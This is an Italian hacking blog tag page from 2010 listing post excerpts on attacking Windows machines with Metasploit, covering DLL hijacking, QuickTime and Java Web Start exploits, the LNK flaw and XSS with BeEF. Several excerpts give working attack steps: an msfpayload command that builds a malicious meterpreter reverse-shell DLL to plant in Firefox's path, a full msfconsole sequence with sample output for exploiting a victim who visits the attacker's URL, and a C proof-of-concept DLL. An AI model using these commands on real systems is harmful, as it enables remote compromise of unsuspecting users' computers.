Metasploit | Clshack

Tag: ‘metasploit’

Tools for search DLL Hijacking Vulnerabilities

settembre 2nd, 2010 by clshack

Maggiori info su questa vulnerabilità, le possiamo trovare qui:

[DLL Hijacking] Windows 7 and more application Remote code Exuction => metasplooit

Vediamo ora come cercare applicazioni vulnerabili :D

Sempre nell’articolo sopra citato, ho mostrato come con metasploit è possibile sfruttare questa vulnerabilità, sfruttando webdav, anche da remoto.

L’exploit creato da HD moore, sviluppatore metaploit è molto semplice.
Il codice che interessa a noi è:

                if (request.uri =~ /\.(dll|dl|drv|cpl)$/i)
                        print_status("#{cli.peerhost}:#{cli.peerport} GET => DLL Payload")
                        return if ((p = regenerate_payload(cli)) == nil)
                        data = Msf::Util::EXE.to_win32pe_dll(framework, p.encoded)
                        send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
                        return
               end

(continua…)

Tags: dll, hack, linux, metasploit, remote, tool, Windows
Posted in Hacking, Software, Windows | 2 Comments »

[MOAUB]Oday on Exploit-DB(Cpanel<=11.25 and Adobe [Flash Player/Acrobat] )

settembre 1st, 2010 by clshack

E parte finalmente questo fantastico progetto:

The Abysssec Security Team is about to unleash its Month Of Abysssec Undisclosed Bugs on us. Abysssec will release a collection of 0days, web application vulnerabilities, and detailed binary analysis (and pocs) for recently released advisories by vendors such as Microsoft, Mozilla, Sun, Apple, Adobe, HP, Novel, etc. The 0day collection includes PoCs and Exploits for Microsoft Excel, Internet Explorer, Microsoft codecs, Cpanel and others. The MOAUB will be hosted on the Exploit Database, and will be updated on a daily basis. Get your hard-hats on, your VM’s and debugging tools organized – it’s gonna be a an intensive ride. Follow both the exploit-db and Abysssec twitter feed to keep updated!

Ed ecco gli oday di settembre by Abysssec:
Title : Cpanel PHP Restriction Bypass Vulnerability Version : < = 11.25 Discovery : http://www.abysssec.com Vendor : http://www.cpanel.net Impact : Ciritical Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec

Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.It can help attacker to bypass restriction such as mod_security , Safemod and disable functions.

(continua...)

Tags: exploit, flash, metasploit, oday, remote
Posted in Hacking | 7 Comments »

Apple QuickTime <= 7.7.7 “_Marshaled_pUnk” Remote Code Execution

agosto 31st, 2010 by clshack

Il 12 agosto 2010 è stata fixata con la versione 7.6.7 di QuickTime una falla critica che permetteva l’esecuzione di codice remoto sul pc vittima.

[METASPLOIT]Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow

Ora il 31 agosto 2010, QuickTime soffre ancora e mette a repentaglio la sicurezza degli utenti.

Vediamo come sfruttare questo exploit con metasploit o.O

Aggiorniamo metasploit:
sudo svn update
Prendiamo l’exploit:
use windows/browser/apple_quicktime_marshaled_punk
(continua…)

Tags: Apple, attack, bug, exploit, lan, metasploit, quiktime
Posted in Hacking | 7 Comments »

[Metasploit] multi/handler :D

agosto 30th, 2010 by clshack

Sfruttando questa opzione di metasploit, possiamo mantenere in ascolto metasploit fino che il client non si connette al nostro server.

In poche parole, se mandiamo exploit in giro (ad esempio via usb) metasploit, resta in ascolto fino che l’utente non lo esegue…

Vediamo come attaccare firefox < = 3.6.8 con il DLL Hijacking e multi/handler di metasploit.

[info DLL Hijacking]

La dll che carica firefox all’esecuzione, è:
dwmapi.dll

Creiamo la falsa dll:
sudo ./msfpayload windows/meterpreter/reverse_tcp LHOST=IP D > dwmapi.dll
(continua…)

Tags: attack, dll, hack, linux, metasploit, usb
Posted in GNU/Linux, Hacking, Software | No Comments »

[DLL Hijacking] Windows 7 and more application Remote code Exuction => metasplooit

agosto 25th, 2010 by clshack

Questa nuova (non così nuova -.-’ ) del DLL Hijacking Exploit sta aprendo le porte a moltissimi virus.
Una immagine illustrativa di alcune applicazzioni vulnerabili:

Applicazioni che vanno incorporate di windows, a firefox e molte altre ancora.

Come funziona questa tecnica ?
(detta alla cazzo di cane merda -.-’ fuck off )
Durante la scrittura di applicazioni, si setta che il programma vada a prendersi delle funzioni contenute nelle dll (librerie).
La cosa errata è che se il programma richiama la dll “h.dll” e questa dll si trova dentro al file che viene aperto, se la PATH non è imposta il programma andrà a cercare la dll h.dll in varie destinazioni tra cui quella dove è situato il file aperto, perciò il programma, carica la falsa dll che avrà le stesse funzioni, della vera dll ma che eseguirà codice malevolo :D .
Ad esempio questo exploit per l’applicazione wap.exe di windows 7:

#include 
#define DLLIMPORT __declspec (dllexport)
int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  evil();
  return 0;
}

(continua…)

Tags: attack, exploit, metasploit, Windows
Posted in Hacking, Software | 22 Comments »

[METASPLOIT]Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow

agosto 14th, 2010 by clshack

Nuova falla per Apple QuickTime 7.6.6 fixata il 12 agosto 2010, con il rilascio della versione 7.6.7.

Dal sito ufficiale:

CVE-ID: CVE-2010-1799

Available for: Windows 7, Vista, XP SP2 or later

Impact: Viewing a maliciously crafted movie file may lead to un unexpected application termination or arbitrary code execution.

Description: A stack buffer overflow exists in QuickTime’s error logging. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed by disabling debug logging. This issue does not affect Mac OS X systems.

Vediamo come utilizzare questo exploit con metasploit o.O

Aggiorniamo metasploit:
sudo svn update
(continua…)

Tags: Apple, attack, codec, metasploit, oday, remote
Posted in Hacking | 7 Comments »

XSS: MORE POWER WITH Beef and Metasploit

agosto 1st, 2010 by clshack

Panicoo, si avevo voglia di un titolo in inglese o.O

Vediamo oggi come attaccare un computer con metasploit, sfruttando un xss, assieme a BeEF(browser exploitation framework)

XSS WIKI:

Il Cross-site scripting (XSS) è una vulnerabilità che affligge siti web dinamici che impiegano un insufficiente controllo dell’input (parametri di richieste HTTP GET o contenuto di richieste HTTP POST). Un XSS permette ad un attaccante di inserire codice al fine di modificare il contenuto della pagina web visitata. In questo modo si potranno sottrarre dati sensibili presenti nel browser degli utenti che visiteranno successivamente quella pagina.
…
…

Bene, cominciamo :D
(continua…)

Tags: attack, linux, metasploit, xss
Posted in GNU/Linux, Hacking, Software | 9 Comments »

[guide pdf metasploit]Ripassiamo Meterpreter :D

luglio 29th, 2010 by clshack

Oggi ho trovato questo interessante articolo:
http://sixthevicious.wordpress.com/2010/07/25/meterpreter/
Visto che tante cose non me le ricordavo, ed essendo ormai sempre in contatto con metasploit, ho deciso di pdfettizzare tutto :D

Ecco le guide:
[DOWNLOAD PDF]Ripassiamo Meterpreter scritta da six, sopra il suo blog :D
[metasploit]Aprire una sessione VNC :)
Mini guida, scritta da un nostro collaboratore(luigi), anni luce fa, ma sempre ottima.

DOWNLOAD GUIDA COMPLETA

Buona lettura :D

Tags: metasploit
Posted in Hacking | 2 Comments »

[CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction

luglio 28th, 2010 by clshack

Ne parlano quasi tutti, però non tutti sanno che è uscito il modulo, per sfruttare questo exploit con metasploit :D
Stuxnet, è un worm che si sta diffondendo sempre più velocemnte, sfruttando la vulnerabilità:CVE-2010-2568 che sfrutta una solita cattiva gestione dei file LNK di windows, permettendo ad attaccker di eseguire codice remoto sulla vittima, oppure propagando i file maligni tramite supporti rimovibili.

I prodotti vulnerabili, sono:

Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systems
Windows Vista Service Pack 1 and Windows Vista Service Pack 2
Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems
Windows Server 2008 R2 for Itanium-based Systems

Vediamo come sfruttare questa vulnerabilità con metasploit :D
(continua…)

Tags: attack, hack, linux, metasploit, vulnerability, Windows
Posted in GNU/Linux, Hacking, Software | 17 Comments »

[Metasploit]Sun Java Web Start Plugin Remote Code Excution

giugno 27th, 2010 by clshack

Exploit, abbastanza vecchio, CVE-2010-0886, ma ne parlo lo stesso per un ovvio motivo.

Se siete su windows, account limitato, java NON SI AGGIORNA, al meno che non abbiate la password di amministrator.
Problema al quanto risolvibile, almeno per me, ma non per molti altri.

Soluzioni contro questo exploit ?
Upgrade to J2SE 1.4.2_07 Upgrade to J2SE 5.0 Update 2

Ma se uno è utente limitato come fa ad aggiornare, al meno che non ci sia un server che distribuisca e installa gli aggiornamenti all’avvio/spegnimento di windows, cosa rara, gli utenti sono tutti FOTTUTI.

Vediamo come usare questo exploit, in metasploit:
sudo svn update
sudo ./msfconsole
use windows/browser/java_ws_arginject_altjvm
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST YOUR_IP
set SRVPORT 80

Se avete apache:
sudo service apache2 stop

set URIPATH /
exploit
Output simile:
[*] Exploit running as background job. [*] Started reverse handler on 192.168.1.39:4444 [*] Using URL: http://0.0.0.0:80/ [*] Local IP: http://192.168.1.39:80/ [*] Server started.

Ora facciamo visitare alla vittima:
http://YOUR_IP:80
Output simile:
[*] Request for "/" does not contain a sub-directory, redirecting to /X2EbB9v10GNe/ ... [*] Responding to "GET /X2EbB9v10GNe/" request from 192.168.1.154:1105 [*] Sending js detection HTML to 192.168.1.154:1105... [*] Responding to "GET /X2EbB9v10GNe/ijIcZf4C.shtml" request from 192.168.1.154:1105 [*] Sending JS version HTML to 192.168.1.154:1105...

E se tutto va bene:
sessions -i 1

e vi si pare meterpreter :D

Tags: attack, exploit, hack, java, metasploit
Posted in Hacking | 5 Comments »

ClsHack.it

Tag: ‘metasploit’

Tools for search DLL Hijacking Vulnerabilities

[MOAUB]Oday on Exploit-DB(Cpanel<=11.25 and Adobe [Flash Player/Acrobat] )

Apple QuickTime <= 7.7.7 “_Marshaled_pUnk” Remote Code Execution

[Metasploit] multi/handler :D

[DLL Hijacking] Windows 7 and more application Remote code Exuction => metasplooit

[METASPLOIT]Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow

XSS: MORE POWER WITH Beef and Metasploit

[guide pdf metasploit]Ripassiamo Meterpreter :D

[CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction

[Metasploit]Sun Java Web Start Plugin Remote Code Excution

Rimani aggiornato:

Ultimi articoli:

Tag:

Info:

Disclamer:

Blog Amici:

Link che seguo: